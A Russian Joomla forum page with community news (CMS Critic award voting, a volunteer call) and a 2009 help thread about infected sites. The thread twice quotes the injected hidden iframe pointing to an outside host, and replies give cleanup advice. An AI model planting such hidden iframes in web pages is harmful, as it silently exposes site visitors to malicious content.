Новости Joomla

🏆 Открыто голосование за Joomla в премии CMS Critic People’s Choice Awards 2025

🏆 Открыто голосование за Joomla в  премии CMS Critic People’s Choice Awards 2025

🗓 Голосование продлится до 27 февраля 2026 года.

👩‍💻 Проголосовать! 👩‍💻

Номинации, в которых можно проголосовать за Joomla:
⭐️ Best Free CMS
⭐️ Best Open Source CMS
⭐️ Best Enterprise CMS

Также в номинации Best e-Commerce Solution участвуют компоненты интернет-магазинов для Joomla:
⭐️ HikaShop
⭐️ Virtuemart

В номинации Best Website Builder оказались:
⭐️ YooTheme
⭐️ SP Page Builder

Что такое CMS Critic Awards?
С 2012 года премия CMS Critic Awards занимает особое место в сообществе систем управления контентом (CMS). Это единственный в своем роде сайт, который составляет рейтинг системы управления контентом и связанных с ними решений на рынке — от малого до крупного и подчеркивает их инновации и услуги.

Каждый год награда CMS Critic Awards присуждается одному победителю в различных отраслевых категориях, таких как: «Лучшая облачная CMS», «Лучший DXP», «Лучшая Headless CMS и других. Затем результаты оглашаются через СМИ вместе с выбором редакции CMS Critic.
В этом году премия вернулась к своим традициям и только TOP-5 движков по количеству номинаций попали в 2-й этап - голосование.

@joomlafeed

👩‍💻 Вместе мы развиваем Joomla: станьте Joomfluencer!

👩‍💻 Вместе мы развиваем Joomla: станьте Joomfluencer!

Вы уверенно чувствуете себя перед камерой, динамичны, обаятельны и всегда улыбаетесь? Чувствуете себя искателем приключений, готовым поделиться своими исследованиями CMS Joomla!, взять интервью у видных деятелей сообщества, пообщаться лично или по видеосвязи с волонтерами Joomla или отправиться на поиски новых идей?

Joomla ищет одного или нескольких волонтеров, готовых вдохнуть новую жизнь в обсуждение Joomla, ее CMS, пользователей, сообщества и многого другого.

Возможны самые разные форматы и темы: шортсы, интервью, аналитика и разборы в режиме реального времени, быстрые советы и рекомендации, знакомство с миром Joomla, изучение открытого исходного кода... Нет никаких ограничений!

Joomla! уже активно представлена ​​во многих социальных сетях:
- 155K подписчиков на Facebook,
- 55K подписчиков на X (ранее Twitter),
- 16K подписчиков на YouTube,
- 14K подписчиков на LinkedIn,
- 5,7K подписчиков в Instagram
а так же другие площадки ждут вас. Аккаунты Threads и Bluesky относительно новые, но их популярность только растёт!

А если хватит энергии, можно рассмотреть и TikTok!

❓ Итак, вы готовы?
👉 Свяжитесь с отделом маркетинга по адресу: marketing@community.joomla.org

Подробности в статье в Joomla Community Magazine.

@joomlafeed

0 Пользователей и 1 Гость просматривают эту тему.
  • 6 Ответов
  • 2666 Просмотров

Заражены страницы
« : 10.07.2009, 11:53:04 »
На нескольких моих сайтах появилась в коде строка  <iframe src="http://u1x.ru:8080/index.php" width=125 height=126 style="visibility: hidden"></iframe> (на всех страницах) хостинг ответил что это заражение, как убрать строку она растягивает шаблон.
*

Funkdoobiest

  • Захожу иногда
  • 244
  • 25 / 13
Re: Заражены страницы
« Ответ #1 : 10.07.2009, 12:02:36 »
в корне сайта откройте index.php и удалите эту строку и за одно посмотрите остальные index.php файлы в разных компонентах, может даже есть в index.html
*

effrit

  • Легенда
  • 10132
  • 1118 / 13
  • effrit.com
Re: Заражены страницы
« Ответ #2 : 10.07.2009, 12:02:58 »
не о том беспокоишься.
строку убрать восстановлением из бакапа.
а вот безопасность надо усилить.

юзай поиск на тему "вломали сайт"

Re: Заражены страницы
« Ответ #3 : 10.07.2009, 13:26:41 »
бекап не помог, вернее помог восстановить сайт (его изначально ваще небыло была синтаксическая ошибка ) а эта дрян прописалась видимо не только в одном месте (на одном сайте в шаблоне поправил index.php ) но есть сайт с VirtueMart там ваще не знаю где искать....

Re: Заражены страницы
« Ответ #4 : 10.07.2009, 13:31:26 »
странно но все встало опять на свои места.... чудеса да и только... :laugh:
*

dzhan

  • Новичок
  • 5
  • 0 / 1
Re: Заражены страницы
« Ответ #5 : 10.07.2009, 18:02:16 »
странно но все встало опять на свои места.... чудеса да и только... :laugh:
Чудес не бывает:)) Чисти весь сайт, это конкретный вирус. Придётся ручками восстановить и index.html/ Я это проходил. А вообще правильно сказали: усиливай безопасность
*

morpheus

  • Новичок
  • 6
  • 0 / 0
Re: Заражены страницы
« Ответ #6 : 25.07.2009, 11:32:19 »
На нескольких моих сайтах появилась в коде строка  <iframe src="http://u1x.ru:8080/index.php" width=125 height=126 style="visibility: hidden"></iframe> (на всех страницах) хостинг ответил что это заражение, как убрать строку она растягивает шаблон.
Просканируй свой компьютер на наличие вирусов. У меня была такая проблема. Был троян который спёр пароль от ftp. Пришлось сначала удалить на компе на своём троянов, а потом менять пароль на ftp.
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Заражены файлы картинок движка Joomla 3

Автор krog

Ответов: 5
Просмотров: 1974
Последний ответ 16.04.2021, 08:16:45
от Taatshi
Как удалить страницы со взломанного сайта?

Автор and3885

Ответов: 71
Просмотров: 5592
Последний ответ 02.05.2017, 06:03:34
от alixsjr
Фонтомные страницы ( нужна помощь )

Автор ks8re

Ответов: 14
Просмотров: 1441
Последний ответ 01.04.2017, 10:06:41
от maximm
Удалить из индекса страницы которые были созданы вирусом в формате параметров: /?Name/

Автор baden13

Ответов: 4
Просмотров: 1897
Последний ответ 08.11.2016, 16:23:57
от baden13
Некоторые страницы начали выдавать ошибку 404

Автор saschka

Ответов: 7
Просмотров: 1207
Последний ответ 10.06.2016, 17:36:57
от wishlight